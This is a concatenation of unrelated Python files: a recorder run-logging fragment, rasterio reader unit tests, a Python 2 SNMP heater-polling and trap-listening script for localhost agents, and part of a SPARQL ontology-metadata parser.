    self.get_session = None
def _setup_run(self):
    """Log the start of the current run.

    Closes out any runs left open by a previous crash (marking them
    ``closed_incorrect``) and stores a new RecorderRuns row in
    ``self.run_info``.
    """
    from .models import RecorderRuns

    with session_scope(session=self.get_session()) as session:
        for run in session.query(RecorderRuns).filter_by(end=None):
            # An open run means the previous process did not shut down
            # cleanly; end it at this process's start time.
            run.closed_incorrect = True
            run.end = self.recording_start
            _LOGGER.warning("Ended unfinished session (id=%s from %s)",
                            run.run_id, run.start)
            session.add(run)

        self.run_info = RecorderRuns(
            start=self.recording_start,
            created=dt_util.utcnow()
        )
        session.add(self.run_info)
        session.flush()
        # Detach run_info so it remains usable after the session
        # closes.
        session.expunge(self.run_info)
def _close_run(self):
    """Save end time for current run."""
    with session_scope(session=self.get_session()) as session:
        self.run_info.end = dt_util.utcnow()
        session.add(self.run_info)

    # Recorder is shutting down; drop the reference to the run row.
    self.run_info = None
| |
import logging
import sys
import unittest
import numpy
from hashlib import md5
import rasterio
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
class ReaderContextTest(unittest.TestCase):
    """Exercise RasterReader metadata, band reads, windows and masks
    against the sample datasets under tests/data."""

    def test_context(self):
        """Metadata is correct while open and survives closing."""
        with rasterio.open('tests/data/RGB.byte.tif') as s:
            self.assertEqual(s.name, 'tests/data/RGB.byte.tif')
            self.assertEqual(s.driver, 'GTiff')
            self.assertEqual(s.closed, False)
            self.assertEqual(s.count, 3)
            self.assertEqual(s.width, 791)
            self.assertEqual(s.height, 718)
            self.assertEqual(s.shape, (718, 791))
            self.assertEqual(s.dtypes, [rasterio.ubyte] * 3)
            self.assertEqual(s.nodatavals, [0] * 3)
            self.assertEqual(s.indexes, [1, 2, 3])
            self.assertEqual(s.crs['init'], 'epsg:32618')
            # assertTrue replaces the legacy unittest alias assert_,
            # which was removed in Python 3.12.
            self.assertTrue(s.crs_wkt.startswith('PROJCS'), s.crs_wkt)
            for i, v in enumerate((101985.0, 2611485.0, 339315.0, 2826915.0)):
                self.assertAlmostEqual(s.bounds[i], v)
            self.assertEqual(
                s.affine,
                (300.0379266750948, 0.0, 101985.0,
                 0.0, -300.041782729805, 2826915.0,
                 0, 0, 1.0))
            self.assertEqual(s.meta['crs'], s.crs)
            self.assertEqual(
                repr(s),
                "<open RasterReader name='tests/data/RGB.byte.tif' "
                "mode='r'>")
        # Cached metadata must still be readable after close.
        self.assertEqual(s.closed, True)
        self.assertEqual(s.count, 3)
        self.assertEqual(s.width, 791)
        self.assertEqual(s.height, 718)
        self.assertEqual(s.shape, (718, 791))
        self.assertEqual(s.dtypes, [rasterio.ubyte] * 3)
        self.assertEqual(s.nodatavals, [0] * 3)
        self.assertEqual(s.crs['init'], 'epsg:32618')
        self.assertEqual(
            s.affine,
            (300.0379266750948, 0.0, 101985.0,
             0.0, -300.041782729805, 2826915.0,
             0, 0, 1.0))
        self.assertEqual(
            repr(s),
            "<closed RasterReader name='tests/data/RGB.byte.tif' "
            "mode='r'>")

    def test_derived_spatial(self):
        """Derived spatial attributes: WKT CRS, bounds, upper-left."""
        with rasterio.open('tests/data/RGB.byte.tif') as s:
            self.assertTrue(s.crs_wkt.startswith('PROJCS'), s.crs_wkt)
            for i, v in enumerate((101985.0, 2611485.0, 339315.0, 2826915.0)):
                self.assertAlmostEqual(s.bounds[i], v)
            for a, b in zip(s.ul(0, 0), (101985.0, 2826915.0)):
                self.assertAlmostEqual(a, b)

    def test_read_ubyte(self):
        """read_band returns an array of the file's dtype."""
        with rasterio.open('tests/data/RGB.byte.tif') as s:
            a = s.read_band(1)
            self.assertEqual(a.dtype, rasterio.ubyte)

    def test_read_ubyte_bad_index(self):
        """Band indexes are 1-based; index 0 raises IndexError."""
        with rasterio.open('tests/data/RGB.byte.tif') as s:
            self.assertRaises(IndexError, s.read_band, 0)

    def test_read_ubyte_out(self):
        """read_band can fill a caller-supplied output array."""
        with rasterio.open('tests/data/RGB.byte.tif') as s:
            a = numpy.zeros((718, 791), dtype=rasterio.ubyte)
            a = s.read_band(1, a)
            self.assertEqual(a.dtype, rasterio.ubyte)

    def test_read_out_dtype_fail(self):
        """A dtype mismatch between file and out array raises."""
        with rasterio.open('tests/data/RGB.byte.tif') as s:
            a = numpy.zeros((718, 791), dtype=rasterio.float32)
            try:
                s.read_band(1, a)
            except ValueError as e:
                self.assertIn(
                    "the array's dtype 'float32' does not match "
                    "the file's dtype", str(e))
            else:
                # The original version passed silently when no
                # exception was raised at all; fail explicitly.
                self.fail("expected ValueError for mismatched dtype")

    def test_read_basic(self):
        """read() shapes, masks, fill values and nodata handling."""
        with rasterio.open('tests/data/shade.tif') as s:
            a = s.read(masked=True)  # Gray
            self.assertEqual(a.ndim, 3)
            self.assertEqual(a.shape, (1, 1024, 1024))
            self.assertTrue(hasattr(a, 'mask'))
            self.assertEqual(a.fill_value, 255)
            self.assertEqual(list(set(s.nodatavals)), [255])
            self.assertEqual(a.dtype, rasterio.ubyte)
            self.assertEqual(a.sum((1, 2)).tolist(), [0])
        with rasterio.open('tests/data/RGB.byte.tif') as s:
            a = s.read(masked=True)  # RGB
            self.assertEqual(a.ndim, 3)
            self.assertEqual(a.shape, (3, 718, 791))
            self.assertTrue(hasattr(a, 'mask'))
            self.assertEqual(a.fill_value, 0)
            self.assertEqual(list(set(s.nodatavals)), [0])
            self.assertEqual(a.dtype, rasterio.ubyte)
            a = s.read(masked=False)  # no mask
            self.assertFalse(hasattr(a, 'mask'))
            self.assertEqual(list(set(s.nodatavals)), [0])
            self.assertEqual(a.dtype, rasterio.ubyte)
        with rasterio.open('tests/data/float.tif') as s:
            a = s.read(masked=True)  # floating point values
            self.assertEqual(a.ndim, 3)
            self.assertEqual(a.shape, (1, 2, 3))
            self.assertTrue(hasattr(a, 'mask'))
            self.assertEqual(list(set(s.nodatavals)), [None])
            self.assertEqual(a.dtype, rasterio.float64)

    def test_read_indexes(self):
        """read() accepts int, list, slice and stride band indexes."""
        with rasterio.open('tests/data/RGB.byte.tif') as s:
            a = s.read()  # RGB
            self.assertEqual(a.ndim, 3)
            self.assertEqual(a.shape, (3, 718, 791))
            self.assertEqual(a.sum((1, 2)).tolist(),
                             [17008452, 25282412, 27325233])
            # read last index as 2D array
            a = s.read(s.indexes[-1])  # B
            self.assertEqual(a.ndim, 2)
            self.assertEqual(a.shape, (718, 791))
            self.assertEqual(a.sum(), 27325233)
            # read last index as 3D array
            a = s.read(s.indexes[-1:])  # [B]
            self.assertEqual(a.ndim, 3)
            self.assertEqual(a.shape, (1, 718, 791))
            self.assertEqual(a.sum((1, 2)).tolist(), [27325233])
            # out of range indexes
            self.assertRaises(IndexError, s.read, 0)
            self.assertRaises(IndexError, s.read, [3, 4])
            # read slice
            a = s.read(s.indexes[0:2])  # [RG]
            self.assertEqual(a.ndim, 3)
            self.assertEqual(a.shape, (2, 718, 791))
            self.assertEqual(a.sum((1, 2)).tolist(), [17008452, 25282412])
            # read stride
            a = s.read(s.indexes[::2])  # [RB]
            self.assertEqual(a.ndim, 3)
            self.assertEqual(a.shape, (2, 718, 791))
            self.assertEqual(a.sum((1, 2)).tolist(), [17008452, 27325233])
            # read zero-length slice: either succeeds or raises
            # ValueError, both acceptable here.
            try:
                a = s.read(s.indexes[1:1])
            except ValueError:
                pass

    def test_read_window(self):
        """read() window format validation and windowed band data."""
        with rasterio.open('tests/data/RGB.byte.tif') as s:
            # flat 4-tuple is the wrong format; must be pair-of-pairs
            self.assertRaises(ValueError, s.read, window=(300, 320, 320, 330))
            # window with 1 nodata on band 3
            a = s.read(window=((300, 320), (320, 330)), masked=True)
            self.assertEqual(a.ndim, 3)
            self.assertEqual(a.shape, (3, 20, 10))
            self.assertTrue(hasattr(a, 'mask'))
            self.assertEqual(a.mask.sum((1, 2)).tolist(), [0, 0, 1])
            # tobytes() replaces the deprecated ndarray.tostring()
            # (removed in NumPy 2.0); identical bytes, same digests.
            self.assertEqual([md5(x.tobytes()).hexdigest() for x in a],
                             ['1df719040daa9dfdb3de96d6748345e8',
                              'ec8fb3659f40c4a209027231bef12bdb',
                              '5a9c12aebc126ec6f27604babd67a4e2'])
            # window without any missing data, but still is masked result
            a = s.read(window=((310, 330), (320, 330)), masked=True)
            self.assertEqual(a.ndim, 3)
            self.assertEqual(a.shape, (3, 20, 10))
            self.assertTrue(hasattr(a, 'mask'))
            self.assertEqual([md5(x.tobytes()).hexdigest() for x in a[:]],
                             ['9e3000d60b4b6fb956f10dc57c4dc9b9',
                              '6a675416a32fcb70fbcf601d01aeb6ee',
                              '94fd2733b534376c273a894f36ad4e0b'])

    def test_read_window_overflow(self):
        """Test graceful Numpy-like handling of windows that overflow
        the dataset's bounds."""
        with rasterio.open('tests/data/RGB.byte.tif') as s:
            a = s.read(window=((None, 20000), (None, 20000)))
            self.assertEqual(a.shape, (3,) + s.shape)

    def test_read_window_beyond(self):
        """Test graceful Numpy-like handling of windows beyond
        the dataset's bounds."""
        with rasterio.open('tests/data/RGB.byte.tif') as s:
            a = s.read(window=((10000, 20000), (10000, 20000)))
            self.assertEqual(a.shape, (3, 0, 0))

    def test_read_window_overlap(self):
        """Test graceful Numpy-like handling of windows partially
        beyond the dataset's bounds."""
        with rasterio.open('tests/data/RGB.byte.tif') as s:
            a = s.read(window=((-100, 20000), (-100, 20000)))
            self.assertEqual(a.shape, (3, 100, 100))

    def test_read_out(self):
        """read() honors the out= parameter and validates its shape,
        dtype and dimensionality."""
        with rasterio.open('tests/data/RGB.byte.tif') as s:
            # regular array, without mask
            a = numpy.empty((3, 718, 791), numpy.ubyte)
            b = s.read(out=a)
            self.assertFalse(hasattr(a, 'mask'))
            self.assertFalse(hasattr(b, 'mask'))
            # with masked array
            a = numpy.ma.empty((3, 718, 791), numpy.ubyte)
            b = s.read(out=a)
            self.assertEqual(id(a.data), id(b.data))
            # TODO: is there a way to id(a.mask)?
            self.assertTrue(hasattr(a, 'mask'))
            self.assertTrue(hasattr(b, 'mask'))
            # use all parameters
            a = numpy.empty((1, 20, 10), numpy.ubyte)
            b = s.read([2], a, ((310, 330), (320, 330)), False)
            self.assertEqual(id(a), id(b))
            # pass 2D array with index
            a = numpy.empty((20, 10), numpy.ubyte)
            b = s.read(2, a, ((310, 330), (320, 330)), False)
            self.assertEqual(id(a), id(b))
            self.assertEqual(a.ndim, 2)
            # different data types
            a = numpy.empty((3, 718, 791), numpy.float64)
            self.assertRaises(ValueError, s.read, out=a)
            # different number of array dimensions
            a = numpy.empty((20, 10), numpy.ubyte)
            self.assertRaises(ValueError, s.read, [2], out=a)
            # different number of array shape in 3D
            a = numpy.empty((2, 20, 10), numpy.ubyte)
            self.assertRaises(ValueError, s.read, [2], out=a)

    def test_read_nan_nodata(self):
        """NaN nodata values are masked out of masked reads."""
        with rasterio.open('tests/data/float_nan.tif') as s:
            a = s.read(masked=True)
            self.assertEqual(a.ndim, 3)
            self.assertEqual(a.shape, (1, 2, 3))
            self.assertTrue(hasattr(a, 'mask'))
            self.assertNotEqual(a.fill_value, numpy.nan)
            self.assertEqual(str(list(set(s.nodatavals))), str([numpy.nan]))
            self.assertEqual(a.dtype, rasterio.float32)
            self.assertFalse(numpy.isnan(a).any())
            a = s.read(masked=False)
            self.assertFalse(hasattr(a, 'mask'))
            self.assertTrue(numpy.isnan(a).any())
            # Window does not contain a nodata value; result is still
            # masked.
            a = s.read(window=((0, 2), (0, 2)), masked=True)
            self.assertEqual(a.ndim, 3)
            self.assertEqual(a.shape, (1, 2, 2))
            self.assertTrue(hasattr(a, 'mask'))
| |
from pysnmp.hlapi import *
from pysnmp.carrier.asynsock.dispatch import AsynsockDispatcher
from pysnmp.carrier.asyncore.dispatch import AsyncoreDispatcher
from pysnmp.carrier.asynsock.dgram import udp
from pysnmp.carrier.asyncore.dgram import udp, udp6, unix
from pyasn1.codec.ber import encoder, decoder
from pysnmp.proto import api
from time import time
import threading
from twisted.internet import task
from twisted.internet import reactor
# Shared mutable state: latest reported lights status, updated by the
# trap-listener thread (newFn) and read by the poller. A one-element
# list so both threads mutate/see the same cell.
lights = ["OFF"]
class SysDescr:
    """Managed-object stand-in for a sysDescr-style OID.

    Instances compare (==, !=, <, <=, >, >=) directly against raw OID
    tuples, and when called with a protocol version they render the
    value as an OctetString.

    NOTE(review): defines __eq__ without __hash__, so instances are
    unhashable under Python 3 — confirm that is acceptable.
    """
    # The OID this object answers for.
    name = (1,3,6,1,1,2,3,4,1)
    def __eq__(self, other): return self.name == other
    def __ne__(self, other): return self.name != other
    def __lt__(self, other): return self.name < other
    def __le__(self, other): return self.name <= other
    def __gt__(self, other): return self.name > other
    def __ge__(self, other): return self.name >= other
    def __call__(self, protoVer):
        # Render the value using the OctetString type of the requested
        # protocol module.
        return api.protoModules[protoVer].OctetString(
            "Test"
        )
class ServerThread (threading.Thread):
    """Background thread that runs the blocking SNMP trap listener
    (openServer) so the main thread stays free for the poll loop."""
    def __init__(self, threadID, name, counter):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.name = name
        self.counter = counter
    def run(self):
        """Thread entry point: start the trap-listening dispatcher
        (blocks until the dispatcher exits)."""
        print "Starting thread 2" + self.name
        openServer()
        print "Exiting thread 2" + self.name
def pollFn():
    """Poll the heater and temperature agents over SNMP.

    Invoked periodically by the twisted LoopingCall in ``__main__``:

    1. GET the heater status from the agent on port 1162.
    2. GET the temperature from the agent on port 1161.
    3. If the temperature is below 10, send a raw SNMPv2c SET turning
       the heater ON; otherwise just report the value.

    All prints use the single-argument call form, which behaves
    identically under Python 2 and 3.
    """
    # Check the heater status
    errorIndication, errorStatus, errorIndex, varBinds = next(
        getCmd(SnmpEngine(),
               CommunityData('public', mpModel=0),
               UdpTransportTarget(('localhost', 1162)),
               ContextData(),
               ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0')))
    )
    if errorIndication:
        print(errorIndication)
    elif errorStatus:
        print('%s at %s' % (
            errorStatus.prettyPrint(),
            errorIndex and varBinds[int(errorIndex)-1][0] or '?'
            )
        )
    else:
        for varBind in varBinds:
            print(' = '.join([x.prettyPrint() for x in varBind]))

    # Get the temperature
    errorIndication, errorStatus, errorIndex, varBinds = next(
        getCmd(SnmpEngine(),
               CommunityData('public', mpModel=0),
               UdpTransportTarget(('localhost', 1161)),
               ContextData(),
               ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0')))
    )
    if errorIndication:
        print(errorIndication)
    elif errorStatus:
        print('%s at %s' % (
            errorStatus.prettyPrint(),
            errorIndex and varBinds[int(errorIndex)-1][0] or '?'
            )
        )
    else:
        # Check if the temperature is less than 10; if so, SET the
        # heater to ON via a hand-built PDU.
        for oid, val in varBinds:
            print('%s = %s' % (oid.prettyPrint(), val.prettyPrint()))
            returnedVal = int(val)
            if returnedVal < 10:
                print(returnedVal)
                # Protocol version to use
                #pMod = api.protoModules[api.protoVersion1]
                pMod = api.protoModules[api.protoVersion2c]
                # Build PDU
                reqPDU = pMod.SetRequestPDU()
                pMod.apiPDU.setDefaults(reqPDU)
                pMod.apiPDU.setVarBinds(
                    reqPDU,
                    # Change the heater status to ON
                    (('1.3.6.1.2.1.1.1.0', pMod.OctetString('ON')),
                     # ('1.3.6.1.2.1.1.3.0', pMod.TimeTicks(12))
                     )
                )
                # Build message
                reqMsg = pMod.Message()
                pMod.apiMessage.setDefaults(reqMsg)
                pMod.apiMessage.setCommunity(reqMsg, 'public')
                pMod.apiMessage.setPDU(reqMsg, reqPDU)

                startedAt = time()

                def cbTimerFun(timeNow):
                    """Abort the exchange if no response within 3s."""
                    if timeNow - startedAt > 3:
                        raise Exception("Request timed out")

                def cbRecvFun(transportDispatcher, transportDomain,
                              transportAddress, wholeMsg, reqPDU=reqPDU):
                    """Decode responses, match them to our request and
                    finish the dispatcher job."""
                    while wholeMsg:
                        rspMsg, wholeMsg = decoder.decode(
                            wholeMsg, asn1Spec=pMod.Message())
                        rspPDU = pMod.apiMessage.getPDU(rspMsg)
                        # Match response to request
                        if pMod.apiPDU.getRequestID(reqPDU) == \
                                pMod.apiPDU.getRequestID(rspPDU):
                            # Check for SNMP errors reported
                            errorStatus = pMod.apiPDU.getErrorStatus(rspPDU)
                            if errorStatus:
                                print(errorStatus.prettyPrint())
                            else:
                                for oid, val in pMod.apiPDU.getVarBinds(rspPDU):
                                    # BUG FIX: the original omitted the
                                    # '%' operator here, which raised
                                    # TypeError at runtime.
                                    print('%s = %s' % (oid.prettyPrint(),
                                                       val.prettyPrint()))
                            transportDispatcher.jobFinished(1)
                    return wholeMsg

                transportDispatcher = AsynsockDispatcher()
                transportDispatcher.registerRecvCbFun(cbRecvFun)
                transportDispatcher.registerTimerCbFun(cbTimerFun)
                # UDP/IPv4
                transportDispatcher.registerTransport(
                    udp.domainName, udp.UdpSocketTransport().openClientMode()
                )
                # Pass message to dispatcher
                transportDispatcher.sendMessage(
                    encoder.encode(reqMsg), udp.domainName, ('localhost', 1162)
                )
                transportDispatcher.jobStarted(1)
                # Dispatcher will finish as job#1 counter reaches zero
                transportDispatcher.runDispatcher()
                transportDispatcher.closeDispatcher()
            else:
                print("value greater than 10")
def newFn(transportDispatcher, transportDomain, transportAddress, wholeMsg):
    """Receive callback for the trap listener.

    Decodes incoming SNMP messages, and for TRAP PDUs extracts the
    lights status string from the varbinds into the shared ``lights``
    cell. Returns any undecoded tail of ``wholeMsg``.
    """
    print "Lights status:"
    print lights[0]
    while wholeMsg:
        msgVer = int(api.decodeMessageVersion(wholeMsg))
        if msgVer in api.protoModules:
            pMod = api.protoModules[msgVer]
        else:
            print('Unsupported SNMP version %s' % msgVer)
            return
        reqMsg, wholeMsg = decoder.decode(
            wholeMsg, asn1Spec=pMod.Message(),
        )
        """
        print('Notification message from %s:%s: %s ' % (
            transportDomain, transportAddress, wholeMsg
            )
        )
        """
        reqPDU = pMod.apiMessage.getPDU(reqMsg)
        if reqPDU.isSameTypeWith(pMod.TrapPDU()):
            if msgVer == api.protoVersion1:
                """
                print('Enterprise: %s' % (
                    pMod.apiTrapPDU.getEnterprise(reqPDU).prettyPrint()
                    )
                )
                print('Agent Address: %s' % (
                    pMod.apiTrapPDU.getAgentAddr(reqPDU).prettyPrint()
                    )
                )
                print('Generic Trap: %s' % (
                    pMod.apiTrapPDU.getGenericTrap(reqPDU).prettyPrint()
                    )
                )
                print('Specific Trap: %s' % (
                    pMod.apiTrapPDU.getSpecificTrap(reqPDU).prettyPrint()
                    )
                )
                print('Uptime: %s' % (
                    pMod.apiTrapPDU.getTimeStamp(reqPDU).prettyPrint()
                    )
                )
                """
                varBinds = pMod.apiTrapPDU.getVarBindList(reqPDU)
            else:
                varBinds = pMod.apiPDU.getVarBindList(reqPDU)
            for oid, val in varBinds:
                #print('%s = %s' % (oid.prettyPrint(), val.prettyPrint()))
                print "RECEIVED a TRAP Message from Light Agent :"
                # NOTE(review): extracts the payload by splitting the
                # value's string repr on "OctetString('" — fragile;
                # breaks if pysnmp changes its repr format. Confirm.
                lights[0] = (((str(val).split("OctetString('"))[1]).split("')))"))[0]
                print (((str(val).split("OctetString('"))[1]).split("')))"))[0]
    return wholeMsg
def openServer():
    """Run a blocking SNMP trap listener on UDP port 1171.

    Listens on both IPv4 (localhost) and IPv6 (::1); received messages
    are handled by newFn. Blocks in runDispatcher() until the
    dispatcher exits.
    """
    print "In Open server mode"
    transportDispatcher = AsyncoreDispatcher()
    transportDispatcher.registerRecvCbFun(newFn)
    # UDP/IPv4
    transportDispatcher.registerTransport(
        udp.domainName, udp.UdpSocketTransport().openServerMode(('localhost', 1171))
    )
    # UDP/IPv6
    transportDispatcher.registerTransport(
        udp6.domainName, udp6.Udp6SocketTransport().openServerMode(('::1', 1171))
    )
    # Job counter never reaches zero, so the dispatcher keeps serving.
    transportDispatcher.jobStarted(1)
    print "job started"
    transportDispatcher.runDispatcher()
    transportDispatcher.closeDispatcher()
if __name__ == "__main__":
    # Run the trap listener in a background thread so the twisted
    # reactor below can drive the poll loop in the main thread.
    serverThread = ServerThread(1, "Thread-Server", 1)
    # Start the server thread
    serverThread.start()

    timeout = 12.0  # poll period in seconds
    l = task.LoopingCall(pollFn)
    l.start(timeout)  # invoke pollFn every `timeout` seconds

    reactor.run()
| |
#!/usr/bin/env python2.7
# encoding: utf-8
# abremaud@esciencefactory.com 20160204
import datetime, copy, rdflib, csv, json, time
from rdflib import Graph
from SparqlOntoParser_supports import get_json
from SparqlOntoParser_supports import inputStringCheck, checkEndpointResponds, stringSimilarity
from SparqlOntoParser_supports import obtainPredicateCount, mergeQueryResults
from SparqlOntoParser_supports import modifyQueryForSubgraph, modifyQueryAddLimitAndOffset
from SparqlOntoParser_supports import sparqlOneEndpoint, urllibOneEndpoint
class OntologyClass(object):
    """Container for one ontology class/term gathered from a SPARQL
    endpoint or REST API, shaped for downstream indexing."""

    def __init__(self):
        # Term content.
        self.labels = []
        self.synonyms = []
        self.direct_parents = []
        self.ancestors = []
        self.direct_children = []
        self.descendants = []
        self.uris = []
        self.description = []
        self.indexed_date = ""
        self.text_auto = "empty"
        # abremaud 20160427
        # Ontology-level metadata (string fields, filled later).
        self.short_form = ""  # not originally included
        self.ontology_iri = ""  # not originally included
        self.ontology_name = ""  # not originally included
        self.ontology_acronym = ""  # not originally planned
        self.ontology_version = ""  # not originally planned
        self.ontology_vdate = ""  # not originally planned

    def create_text_auto_from_labels(self):
        """Merge all labels into the free-text search field."""
        if self.labels:
            self.text_auto = ' '.join(self.labels)

    def create_short_form_from_uris(self):
        """Set short_form to the segment after the last '/' of the
        first URI (empty when there are no URIs)."""
        if self.uris:
            rev_url = self.uris[0][::-1]
            self.short_form = rev_url[:rev_url.find('/')][::-1]

    def api_ontology_metadata(self, apikey=None):
        """Fetch ontology name/acronym from the REST API at
        `ontology_iri` (best effort; any failure is ignored)."""
        try:
            if self.ontology_iri:
                if apikey:
                    j = get_json(str(self.ontology_iri), str(apikey))
                else:
                    j = get_json(str(self.ontology_iri))
                if isinstance(j, dict):
                    for k in ["name", "acronym"]:
                        if k in j.keys() and isinstance(j[k], (str, unicode)):
                            # BUG FIX: these fields are strings, not
                            # lists; the original called .append() on
                            # them, which always raised AttributeError
                            # (silently swallowed by the bare except).
                            if k == "name":
                                self.ontology_name = j[k]
                            if k == "acronym":
                                self.ontology_acronym = j[k]
        except:
            pass

    def to_JSON(self):
        """Serialize all fields as pretty-printed, key-sorted JSON."""
        # BUG FIX: keyword was misspelled 'sort_keysv', which made
        # json.dumps raise TypeError on every call.
        return json.dumps(self, default=lambda o: o.__dict__,
                          sort_keys=True, indent=4)
def fillOntoClassField(onto_class=None, fieldname=None, info=None):
    """Assign `info` (a string, or list of strings) to the named field
    of an OntologyClass.

    String fields are overwritten; list fields are appended to,
    skipping duplicates. List-valued `info` is applied item by item
    recursively. Returns the updated class, or None when any argument
    is missing/invalid.
    """
    out = None
    try:
        if onto_class and fieldname and info:
            if isinstance(onto_class, OntologyClass):
                if isinstance(fieldname, (str, unicode)):
                    if fieldname in onto_class.__dict__.keys():
                        if isinstance(onto_class.__dict__[fieldname], (str, unicode)):
                            if isinstance(info, (str, unicode)):
                                onto_class.__dict__[fieldname] = info
                            elif isinstance(info, list):
                                for item in info:
                                    onto_class = fillOntoClassField(onto_class, fieldname, item)
                        elif isinstance(onto_class.__dict__[fieldname], list):
                            if isinstance(info, (str, unicode)) and info not in onto_class.__dict__[fieldname]:
                                onto_class.__dict__[fieldname].append(info)
                            elif isinstance(info, list):
                                for item in info:
                                    onto_class = fillOntoClassField(onto_class, fieldname, item)
                        out = onto_class
    except:
        # BUG FIX: the original had a bare string expression here (a
        # no-op), so failures were completely silent; print it like
        # the sibling functions do.
        print("could not fill ontology class field with provided info.")
    return out
def updateOntoClassFields(onto_class=None, r=None):
    """Fill an OntologyClass from one SPARQL result binding.

    `r` is a single SPARQL-JSON binding: a dict mapping variable names
    to ``{"value": ...}`` dicts. Each string-valued variable is copied
    into the matching OntologyClass field; text_auto and the indexing
    timestamp are refreshed afterwards. Returns the updated class, or
    None on failure.
    """
    out = None
    try:
        if onto_class and r:
            if isinstance(onto_class, OntologyClass) and isinstance(r, dict):
                for k in r.keys():
                    if isinstance(k, (str, unicode)):
                        if r[k]:
                            if isinstance(r[k], dict):
                                if "value" in r[k].keys():
                                    if isinstance(r[k]["value"], (str, unicode)):
                                        onto_class = fillOntoClassField(onto_class, k, r[k]["value"])
                onto_class.create_text_auto_from_labels()
                #set datetime (midnight UTC-style stamp of today)
                date_now = datetime.datetime.today().strftime("%Y-%m-%dT00:00:00Z")
                onto_class.indexed_date = date_now
                out = onto_class
    except:
        print "Could not update ontology class fields."
    return out
def buildOntoClassContainer(res):
    """Convert a SPARQL-JSON result into a list of class dicts.

    Groups bindings by their "uris" value: the first binding for a URI
    creates an OntologyClass, later bindings for the same URI update
    the existing one (replacing it in the container). Returns a list
    of the classes' ``__dict__``s, or None on failure.
    """
    out = None
    try:
        if res:
            if isinstance(res, dict):
                if "results" in res.keys():
                    if isinstance(res["results"], dict):
                        if "bindings" in res["results"].keys():
                            if isinstance(res["results"]["bindings"], list):
                                container = []
                                classes_analysed = set()
                                counter = 0
                                for r in res["results"]["bindings"]:
                                    counter += 1
                                    if "uris" in r.keys() and "value" in r["uris"].keys() and isinstance(r["uris"]["value"], (str, unicode)):
                                        curr_class = None
                                        # Reuse the class already built
                                        # for this URI, if any.
                                        if r["uris"]["value"] in classes_analysed:
                                            for exist_class in container:
                                                if r["uris"]["value"] in exist_class.uris:
                                                    curr_class = exist_class
                                                    break
                                        if not curr_class:
                                            curr_class = OntologyClass()
                                            curr_class.uris.append( r["uris"]["value"] )
                                            curr_class.create_short_form_from_uris()
                                        if curr_class:
                                            curr_class = updateOntoClassFields(curr_class, r)
                                            # Drop the stale copy before
                                            # appending the updated one.
                                            if r["uris"]["value"] in classes_analysed:
                                                container = [exist_class for exist_class in container if r["uris"]["value"] not in exist_class.uris]
                                            container.append( curr_class )
                                            classes_analysed.add( r["uris"]["value"] )
                                out = [oc.__dict__ for oc in container]
    except:
        print "Could not build container of ontology classes."
    return out
def jsonOrFollow(url=None, pids=None, apikey=None, binding=None, follow_keys_list=None):
    """Fetch JSON from `url` and map selected keys into a SPARQL-style
    binding dict.

    `pids` is a tuple of {binding_var: json_key} dicts. Keys absent
    from the fetched document may be resolved by following the
    document's "links" entries named in `follow_keys_list` (a key name
    or list of key names), recursing into the linked documents.
    Returns the (possibly shared/updated) binding dict, or None on
    failure.
    """
    out = None
    try:
        if not binding: binding = {}
        o_meta = None
        if url:
            if isinstance(url, (str, unicode)):
                if not apikey:
                    o_meta = get_json(str(url))
                elif isinstance(apikey, str):
                    o_meta = get_json(str(url), apikey)
                elif isinstance(apikey, unicode):
                    o_meta = get_json(str(url), str(apikey))
        if o_meta and pids:
            if isinstance(o_meta, dict) and isinstance(pids, tuple):
                for p in pids:
                    if isinstance(p, dict):
                        for k in p.keys():
                            if p[k] in o_meta.keys():
                                if isinstance(o_meta[p[k]], (str, unicode)):
                                    binding[unicode(k)] = {u'type': u'typed-literal', u'value': o_meta[p[k]]}
                                elif isinstance(o_meta[p[k]], list):
                                    # List values become a list of
                                    # typed-literal binding dicts.
                                    for elit in o_meta[p[k]]:
                                        if isinstance(elit, (str,unicode)):
                                            if k not in binding.keys():
                                                binding[unicode(k)] = []
                                            binding[unicode(k)].append({u'type': u'typed-literal', u'value': elit})
                            elif follow_keys_list:
                                # Key missing: try the document's
                                # "links" and recurse into them.
                                if isinstance(follow_keys_list, list):
                                    for item in follow_keys_list:
                                        binding = jsonOrFollow(url, pids, apikey, binding, item)
                                if isinstance(follow_keys_list, (str, unicode)):
                                    if "links" in o_meta.keys() and isinstance(o_meta["links"], dict) and follow_keys_list in o_meta["links"].keys():
                                        if isinstance(o_meta["links"][follow_keys_list], (str, unicode)):
                                            binding = jsonOrFollow(o_meta["links"][follow_keys_list], pids, apikey, binding)
        out = binding
    except:
        print "Could not json_or_follow."
    return out
def addOntoMetadataToMockSparql(res=None, pids=None, apikey=None):
    """Augment each binding of a (mock) SPARQL result with
    ontology-level metadata fetched from its "ontology_iri".

    Metadata lookups are cached per ontology IRI in `prev_onto_dict`
    so each ontology is fetched only once. Any binding key containing
    "ontology_" is copied onto the item and declared in the result's
    head "vars". Returns the mutated result, or None on failure.
    """
    out = None
    try:
        prev_onto_dict = {}
        if res:
            if isinstance(res, dict):
                if "results" in res.keys():
                    if isinstance(res["results"], dict):
                        if "bindings" in res["results"].keys():
                            if isinstance(res["results"]["bindings"], list):
                                for item in res["results"]["bindings"]:
                                    if isinstance(item, dict):
                                        if "ontology_iri" in item.keys():
                                            if isinstance(item["ontology_iri"], dict):
                                                if "value" in item["ontology_iri"].keys():
                                                    if isinstance(item["ontology_iri"]["value"], (str, unicode)):
                                                        binding = {}
                                                        # Use the cached metadata if this
                                                        # ontology was already fetched.
                                                        if item["ontology_iri"]["value"] in prev_onto_dict.keys():
                                                            binding = prev_onto_dict[item["ontology_iri"]["value"]]
                                                        else:
                                                            binding = jsonOrFollow(item["ontology_iri"]["value"], pids, apikey, None, "latest_submission")
                                                            if binding:
                                                                if isinstance(binding, dict):
                                                                    prev_onto_dict[item["ontology_iri"]["value"]] = binding
                                                        if binding:
                                                            if isinstance(binding, dict):
                                                                for k in binding.keys():
                                                                    if isinstance(k, (str, unicode)) and "ontology_" in k:
                                                                        # Declare the variable in the
                                                                        # result head if new.
                                                                        if "head" in res.keys():
                                                                            if isinstance(res["head"], dict):
                                                                                if "vars" in res["head"].keys():
                                                                                    if isinstance(res["head"]["vars"], list):
                                                                                        if k not in res["head"]["vars"]:
                                                                                            res["head"]["vars"].append(unicode(k))
                                                                        item[unicode(k)] = binding[k]
        out = res
    except:
        print "Could not add ontology metadata info to mock sparql json."
